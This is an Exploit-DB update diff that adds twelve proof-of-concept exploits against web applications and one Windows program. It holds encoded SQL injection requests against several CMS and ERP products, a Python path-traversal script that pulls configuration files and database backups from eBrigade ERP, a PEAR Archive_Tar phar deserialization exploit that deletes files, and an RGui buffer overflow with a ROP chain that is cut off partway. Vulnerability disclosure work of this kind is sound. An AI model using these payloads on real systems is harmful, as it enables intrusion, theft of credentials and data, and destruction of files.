DB: 2019-01-11

12 changes to exploits/shellcodes

RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)
PEAR Archive_Tar < 1.4.4 - PHP Object Injection
eBrigade ERP 4.5 - Arbitrary File Download
Matrix MLM Script 1.0 - Information Disclosure
doitX 1.0 - 'search' SQL Injection
Shield CMS 2.2 - 'email' SQL Injection
Architectural 1.0 - 'email' SQL Injection
MLMPro 1.0 - SQL Injection
Event Calendar 3.7.4 - 'id' SQL Injection
Event Locations 1.0.1 - 'id' SQL Injection
eBrigade ERP 4.5 - SQL Injection
OpenSource ERP 6.3.1. - SQL Injection

exploits/multiple/webapps/46118.txt

@@ -0,0 +1,31 @@
+#Exploit Title: OpenSource ERP SQL Injection
+#Date: 10.01.2019
+#Exploit Author: Emre ÖVÜNÇ
+#Vendor Homepage: http://www.nelson-it.ch
+#Software Link: http://sourceforge.net/projects/opensourceerp/files/Windows/erp_6.3.1.exe/download
+#Version: v6.3.1
+#Tested on: Windows
+
+# CVE-2019-5893
+https://github.com/EmreOvunc/OpenSource-ERP-SQL-Injection
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5893
+https://www.emreovunc.com/blog/en/OpenERP-SQL-DBversion.png
+
+# PoC
+
+POST /db/utils/query/data.xml HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
+Accept: */*
+Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+Origin: http://172.16.118.142:8024
+Referer: http://172.16.118.142:8024/
+Cache-Control: no-cache
+Accept-Language: en-us,en;q=0.5
+Cookie: MneHttpSessionId8024=15471285865828
+Host: 172.16.118.142:8024
+Content-Length: 414
+Accept-Encoding: gzip, deflate
+Connection: close
+
+sqlend=1&query=%27%7c%7ccast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7c(SELECT+VERSION())%7c%7cchr(95)%7c%7cchr(33)%7c%7cchr(64))+as+numeric)%7c%7c%27&schema=mne_application&table=userpref&cols=startweblet%2cregion%2cmslanguage%2cusername%2cloginname%2cpersonid%2clanguage%2cregionselect%2ctimezone%2ccountrycarcode%2cstylename%2cusername%2cstartwebletname&usernameInput.old=session_user&mneuserloginname=test

exploits/php/webapps/46108.txt

@@ -0,0 +1,81 @@
+PEAR Archive_Tar < 1.4.4 - PHP Object Injection
+
+Date:
+  January 10, 2019
+
+Author:
+  farisv
+
+Vendor Homepage:
+  https://pear.php.net/package/Archive_Tar/
+
+Vulnerable Package Link:
+  http://download.pear.php.net/package/Archive_Tar-1.4.3.tgz
+
+CVE:
+  CVE-2018-1000888
+
+In PEAR Archive_Tar before 1.4.4, there are several file operation with `$v_header['filename']` as parameter (such as file_exists, is_file, is_dir, etc). When extract() is called without a specific prefix path, we can trigger phar induced unserialization by crafting a tar file with `phar://[path_to_malicious_phar_file]` as path name. Object injection can be used to trigger destructor/wakeup method in the loaded PHP classes, e.g. the Archive_Tar class itself. With Archive_Tar itself, we can trigger arbitrary file deletion because `@unlink($this->_temp_tarname)` will be called in the destructor method. If another class with useful gadget is loaded, remote code execution may be possible.
+
+
+Steps to reproduce object injection and arbitrary file deletion:
+
+1. Make sure that PHP & PEAR are installed.
+2. Download vulnerable PEAR Archive_Tar.
+
+$ wget http://download.pear.php.net/package/Archive_Tar-1.4.3.tgz
+$ tar xfz Archive_Tar-1.4.3.tgz
+$ cd Archive_Tar-1.4.3
+
+3. Create vulnerable code (vulnerable.php).
+
+```
+<?php
+  require 'Archive/Tar.php';
+
+  $exploit = new Archive_Tar('exploit.tar');
+  $exploit->extract();
+```
+
+4. Create dummy file /tmp/test.
+
+$ touch /tmp/test
+
+5. Genereate exploit.phar with the following PHP code and place the exploit.phar in the same directory with vulnerable.php.
+
+```
+<?php
+
+class Archive_Tar {
+  public $_temp_tarname;
+}
+
+$phar = new Phar('exploit.phar');
+$phar->startBuffering();
+$phar->addFromString('test.txt', 'text');
+$phar->setStub('<?php __HALT_COMPILER(); ? >');
+
+$object = new Archive_Tar;
+$object->_temp_tarname = '/tmp/test';
+$phar->setMetadata($object);
+$phar->stopBuffering();
+```
+
+6. Create exploit.tar with the following Python code.
+
+```
+import tarfile
+
+tf = tarfile.open('exploit.tar', 'w')
+
+tf.add('/dev/null', 'phar://exploit.phar')
+tf.close()
+```
+
+7. Execute vulnerable.php to trigger object injection to delete /tmp/test.
+
+$ ls -alt /tmp/test
+-rw-rw-r-- 1 vagrant vagrant 0 Jan  9 16:41 /tmp/test
+$ php vulnerable.php
+$ ls -alt /tmp/test
+ls: cannot access '/tmp/test': No such file or directory

exploits/php/webapps/46109.py

@@ -0,0 +1,123 @@
+#!/usr/bin/python
+  
+import mechanize, sys, cookielib, requests
+import colorama, urllib, re, random, urllib2
+import wget
+from colorama import Fore
+from tqdm import tqdm
+from pathlib import Path
+ 
+def bannerche():
+    print '''
+ @-------------------------------------------------------------@
+ |  eBrigade ERP <= 4.5 - Database Backup Disclosure via AFD   |
+ |            Vulnerability discovered by AkkuS                |
+ |            My Blog - https://pentest.com.tr                 |
+ @-------------------------------------------------------------@
+          '''
+bannerche()
+  
+if (len(sys.argv) != 2):
+    print "[*] Usage: poc.py <RHOST>"
+    exit(0)
+  
+rhost = sys.argv[1]
+UserName = str(raw_input("Identifiant: ")) # Administrator/User Username Input
+Password = str(raw_input("Password: "))  # Administrator/User Password Input
+  
+print(Fore.BLUE + "+ [*] Getting login permission...")
+br = mechanize.Browser()                 # set cookies
+br.set_handle_robots(False)
+cj = cookielib.LWPCookieJar()
+br.set_cookiejar(cj)
+  
+br.open("http://"+rhost+"/")             # User Access Login
+assert br.viewing_html()
+br.select_form(nr=0)
+br.form['id'] = UserName
+br.form['pwd'] = Password
+br.submit()
+
+##
+# Login Access and Version Control
+##
+  
+LoginControl = requests.get("http://"+rhost+"/index_d.php", cookies=cj)
+HTMLdata = LoginControl.text 
+
+finder = re.findall(r'version<b> 4.5', HTMLdata)
+try:
+    version = finder[0].replace('"','').replace('<b>','').strip()
+except IndexError:
+    pass 
+try:
+    if version == "version 4.5":
+       print (Fore.GREEN + "+ [*] Login successful")
+except NameError:
+    pass
+    print (Fore.RED + "+ [*] User information is incorrect or version incompatible")
+##
+# Introducing Cookie and CSRF token information
+##
+
+print (Fore.BLUE + "+ [*] Select Exploit Type:")
+print (Fore.YELLOW +"- [*] 1 - Arbitrary File Download/Read (Ex: /conf/sql.php)")
+print ("- [*] 2 - Database Backup File Download")
+choice = int(raw_input("- [*] Enter a number (1 or 2) : "))
+
+if choice == 1:
+    print (Fore.BLUE + "+ [*] Select the file you want to Download/Read:")
+    print (Fore.YELLOW + "- [*] 1 - /conf/sql.php")
+    print ("- [*] 2 - /config.php")
+    print ("- [*] 3 - /.htaccess.template")
+    print ("- [*] 4 - Manual exploitation")
+    AFDc = int(raw_input("- [*] Enter a number : "))
+    if AFDc == 1:
+        AFD1 = requests.get("http://"+rhost+"/showfile.php?section=0&pompier=1&file=../../../conf/sql.php",  cookies=cj)
+        print AFD1.text
+    elif AFDc == 2:
+        AFD2 = requests.get("http://"+rhost+"/showfile.php?section=0&pompier=1&file=../../../config.php",  cookies=cj)
+        print AFD2.text
+    elif AFDc == 3:
+        AFD3 = requests.get("http://"+rhost+"/showfile.php?section=0&pompier=1&file=../../../.htaccess.template",  cookies=cj)
+        print AFD3.text
+    elif AFDc == 4:
+        print (Fore.RED +"- [!] You must have knowledge of files and directories")
+        AFDmc = str(raw_input(Fore.BLUE + "+ [*] Enter file name (Ex: /lib/PHPMailer/class.smtp.php) : "))
+        AFD4 = requests.get("http://"+rhost+"/showfile.php?section=0&pompier=1&file=../../.."+AFDmc+"",  cookies=cj)
+        if AFD4.status_code == 200:
+           try:
+               mdata = AFD4.text 
+               Le = re.findall(r'javascript:history.back', mdata)
+               LeClean = Le[0].replace('"','').strip()
+               if LeClean == "javascript:history.back":
+                  print (Fore.RED + "+ [X] The directory and file name you entered could not be found or incorrect")
+           except IndexError:
+               pass
+               print AFD4.text
+        else:
+           print (Fore.RED + "+ [X] Unable to access file")
+           sys.exit()
+    else:
+        print("Invalid input!")
+
+elif choice == 2:
+
+    backupfiles = requests.get("http://"+rhost+"/restore.php?file=",  cookies=cj)
+    RecentesData = backupfiles.text
+    finder = re.findall(r'a href=".*"', RecentesData)
+    names = finder[0].replace('"','').replace('javascript:deletefile','').replace('a href=javascript:restore','').replace('save','').replace("'",'').replace('(','').replace(')','').replace(',','').strip()
+    print ("+ [*] Backup File Name : " + names)
+
+    DB = requests.get("http://"+rhost+"/showfile.php?section=0&pompier=1&file=../../../user-data/save/"+names+"",  cookies=cj)
+
+    with open(names, "wb") as handle:
+        for data in tqdm(DB.iter_content()):
+            handle.write(data)
+
+    p = str(Path.cwd())
+    print(Fore.GREEN + "+ [*] Backup successfully downloaded. Directory path : " + p + "/" + names)
+else:
+    print("Invalid input!")
+
+# end

exploits/php/webapps/46110.txt

@@ -0,0 +1,48 @@
+# Exploit Title: Matrix MLM Script 1.0 - Information Leakage
+# Dork: N/A
+# Date: 2019-01-10
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://royallifefoundation.org/
+# Software Link: https://codecanyon.net/item/mlmpro-multistage-forced-matrix-mlm-script/23050292
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/modules/getdata.php
+# 
+# userid=
+# username=
+# profileid=
+# passport=
+# currentstage=
+# l_member=
+# r_member=
+# firstname=
+# lastname=
+# emailaddress=
+# parentid=1
+
+GET /[PATH]/modules/getdata.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=e1js8vek57sgge2oso51do2255
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+HTTP/1.1 200 OK
+Date: Wed, 09 Jan 2019 18:24:01 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.39
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: Accept-Encoding,User-Agent
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked

exploits/php/webapps/46111.txt

@@ -0,0 +1,36 @@
+# Exploit Title: doitX 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-10
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://mybizcms.com/
+# Software Link: https://codecanyon.net/item/doitx/23041037
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/searchs?search=[SQL]&search_from=entries
+# 
+
+POST /[PATH]/searchs?search=%45%66%65%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31,%76%65%72%73%69%6f%6e%28%29,%33%2c%34%2c%35,%36%2c%37%2c%38%2c%39%2c%31%30,%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35,%31%36%2c%31%37%2d%2d%20%2d&search_from=entries HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Cookie: PHPSESSID=0d8ccf7db10abc97c8d3c41fa705cbbc
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Wed, 09 Jan 2019 19:19:05 GMT
+Server: Apache
+X-Powered-By: PHP/7.2.13
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked

exploits/php/webapps/46112.txt

@@ -0,0 +1,39 @@
+# Exploit Title: SHIELD - Freelancer Content Management System 2.2 - SQL Injection / CSRF
+# Dork: N/A
+# Date: 2019-01-10
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://ezcode.pt/
+# Software Link: https://codecanyon.net/item/shield-content-management-system/18833498
+# Version: 2.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# http://localhost/[PATH]/shield/forgot.php
+# 
+
+POST /[PATH]/shield/forgot.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 749
+Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2; EU_COOKIE_LAW_CONSENT=true
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+_csrf=0089a3c48ac05616e608ef7e74c98411&email=%27%7c%7c%28%53%45%4c%45%43%54%20%27%62%5a%74%57%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45%20%31%31%3d%31%31%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%3d%31%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&submit=Reset%2BPassword: undefined
+HTTP/1.1 200 OK
+Date: Wed, 09 Jan 2019 23:34:20 GMT
+Server: Apache
+X-Powered-By: PHP/5.5.38
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=utf-8

exploits/php/webapps/46113.txt

@@ -0,0 +1,40 @@
+# Exploit Title: Architectural Cms 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-10
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://ezcode.pt/
+# Software Link: https://codecanyon.net/item/architectural-multipage-theme-admin-panel/20968597
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+
+# POC: 
+# http://localhost/[PATH]/backoffice/forgot.php
+# 
+
+POST /[PATH]/backoffice/forgot.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 749
+Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2; EU_COOKIE_LAW_CONSENT=true
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+_csrf=0089a3c48ac05616e608ef7e74c98411&email=%27%7c%7c%28%53%45%4c%45%43%54%20%27%62%5a%74%57%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%45%20%31%31%3d%31%31%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%3d%31%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%29%7c%7c%27&submit=Reset%2BPassword: undefined
+HTTP/1.1 200 OK
+Date: Wed, 09 Jan 2019 22:53:02 GMT
+Server: Apache
+X-Powered-By: PHP/5.5.38
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=utf-8

exploits/php/webapps/46114.txt

@@ -0,0 +1,44 @@
+# Exploit Title: Matrix MLM Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-10
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://royallifefoundation.org/
+# Software Link: https://codecanyon.net/item/mlmpro-multistage-forced-matrix-mlm-script/23050292
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/login.php?section=login
+# http://localhost/[PATH]/modules/deleteadmin.php?id=[SQL]
+# http://localhost/[PATH]/modules/deletepin.php?id=[SQL]
+# http://localhost/[PATH]/modules/activateadmin.php?id=[SQL]
+# http://localhost/[PATH]/?section=read&mailid=[SQL]
+# 
+
+POST /[PATH]/login.php?section=login HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 538
+Cookie: PHPSESSID=e1js8vek57sgge2oso51do2255
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+username=%2d%31%27%20%55%4eI%4f%4e%20%2f%2a%21%31%31%31%31%31%53EL%45%43%54%2a%2f%20%31%2c%32%2c%33%2c%34%2c%35%2c%36,%43%4f%4e%43%41%54%28%55%53%45%52%28%29%2c%30%78%32%64%2c%56%45%52%53%49%4f%4e%28%29%29%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36,%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2d%2d%20%2d&password=&submit=Login: undefined
+HTTP/1.1 302 Moved Temporarily
+Date: Wed, 09 Jan 2019 17:09:32 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.39
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: /index.php
+Vary: Accept-Encoding,User-Agent
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked

exploits/php/webapps/46115.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Event Calendar 3.7.4 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-10
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://ezcode.pt/
+# Software Link: https://codecanyon.net/item/event-calendar-phpmysql-plugin/19246267
+# Version: 3.7.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/events_edit.php?id=[SQL]
+# 
+
+GET /[PATH]/events_edit.php?id=%2d%31%30%33%31%27%20%2f%2a%21%31%31%31%311%55%4e%49%4f%4e%20%2a%2f%2f%2a!11111SELE%43%54%2a%2f%20%31%2c%32%2c%33%2c%76%65%72%73%69%6f%6e%28%29%2c%35%2c%36%2c%37,8--%20- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2; EU_COOKIE_LAW_CONSENT=true
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Wed, 09 Jan 2019 23:31:12 GMT
+Server: Apache
+X-Powered-By: PHP/5.5.38
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Upgrade: h2,h2c
+Connection: Upgrade, Keep-Alive
+Keep-Alive: timeout=5, max=100
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=utf-8

exploits/php/webapps/46116.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Event Locations 1.0.1 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-10
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://ezcode.pt/
+# Software Link: https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679
+# Version: 1.0.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/events_edit.php?id=[SQL]
+# 
+
+GET /[PATH]/events_edit.php?id=%2d%32%33%36%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31111%31%53%45%4c%45%43%54%2a%2f%20%31%2c%32%2c%33%2c%76%65%72%73%69%6f%6e%28%29%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=84955lhp1purfrvdrvhs7a00q2; EU_COOKIE_LAW_CONSENT=true
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Wed, 09 Jan 2019 22:28:38 GMT
+Server: Apache
+X-Powered-By: PHP/5.5.38
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Upgrade: h2,h2c
+Connection: Upgrade, Keep-Alive
+Keep-Alive: timeout=5, max=100
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=utf-8

exploits/php/webapps/46117.txt

@@ -0,0 +1,52 @@
+# Exploit Title: eBrigade ERP 4.5 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-10
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://ebrigade.net/
+# Software Link: https://netcologne.dl.sourceforge.net/project/ebrigade/ebrigade/eBrigade%204.5/ebrigade_4.5.zip
+# Version: 4.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/pdf.php?pdf=DPS&id=[SQL]
+# 
+
+#/[PATH]/pdf.php
+
+#30 $id=$_SESSION['id'];
+#31 
+#32 $badges = ""; $devis = "";
+#33 
+#34 $page =(isset($_GET['page'])?intval($_GET['page']):0);
+#35 
+#36 $doc = (isset($_POST['pdf'])?secure_input($dbc,$_POST['pdf']):(isset($_GET['pdf'])?secure_input($dbc,$_GET['pdf']):""));
+#37 
+#38 $devis = explode(",",(isset($_POST['id'])?secure_input($dbc,$_POST['id']):(isset($_GET['id'])?secure_input($dbc,$_GET['id']):"")));
+#39 
+#40 $badges = explode(",",(isset($_POST['SelectionMail'])?secure_input($dbc,$_POST['SelectionMail']):(isset($_GET['SelectionMail'])?secure_input($dbc,$_GET['SelectionMail']):"")));
+#41 
+	
+GET /[PATH]/pdf.php?pdf=DPS&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4fM%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4fNCA%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43AT(C%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52OM+%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4cES+W%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54+%30%2c%31%29,%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4cES+GR%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=qsaq65v2oalshif28tmsd7c261
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Thu, 10 Jan 2019 19:14:28 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Pragma: no-cache
+Content-Length: 875
+Keep-Alive: timeout=5, max=60
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/windows/local/46107.py

@@ -0,0 +1,111 @@
+#!/usr/bin/python
+
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)
+# Date: 01-09-2018
+# Vulnerable Software: RGui 3.5.0
+# Vendor Homepage: https://www.r-project.org/
+# Version: 3.5.0
+# Software Link: https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe
+# Tested On: Windows 7 x86
+#
+# lots of bad chars, use alpha_mixed
+# badchars \x00\x0a\x0d\x0e and \x80 through \xbf
+#
+# this was fixed in 3.5.1;
+#
+# PoC: 
+# 1. generate rgui350dep.txt, copy contents to clipboard
+# 2. open app, select Edit, select 'GUI preferences'
+# 3. paste rgui350dep.txt contents into 'Language for menus and messages'
+# 4. select OK
+# 5. pop calc
+#
+
+import struct 
+filename="rgui350dep.txt"
+
+junk = "A"*904
+
+#{pivot 2556 / 0x9fc}
+# ADD ESP,9EC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Rgraphapp.dll]
+seh = struct.pack('<L',0x637561a2)
+
+#adjust
+nops = "\x90"*40
+
+#ROP Chain for VirtualAlloc()
+#!mona rop -cpb "\x00\x0a\x0d\x0e"
+#rop chain generated with mona.py - www.corelan.be
+def create_rop_chain():
+
+    rop_gadgets = [
+      0x6c931aaa,  # POP EAX # RETN [R.dll] 
+      0x6e759b5c,  # ptr to &VirtualAlloc() [IAT R.dll]
+      0x6ff41ce5,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll] 
+      0x6c969986,  # XCHG EAX,ESI # RETN [R.dll] 
+      0x6c05596c,  # POP EBP # RETN [Rlapack.dll] 
+      0x6cb9bc4a,  # & call esp [R.dll]
+      0x6c931b1a,  # POP EAX # RETN [R.dll] 
+      0xffffffff,  # Value to negate, will become 0x00000001
+      0x63742b7f,  # NEG EAX # RETN [Rgraphapp.dll] 
+      0x63747d47,  # XCHG EAX,EBX # RETN [Rgraphapp.dll] 
+      0x63977f84,  # POP EAX # RETN [graphics.dll] 
+      0xa4e74b7d,  # put delta into eax (-> put 0x00001000 into edx)
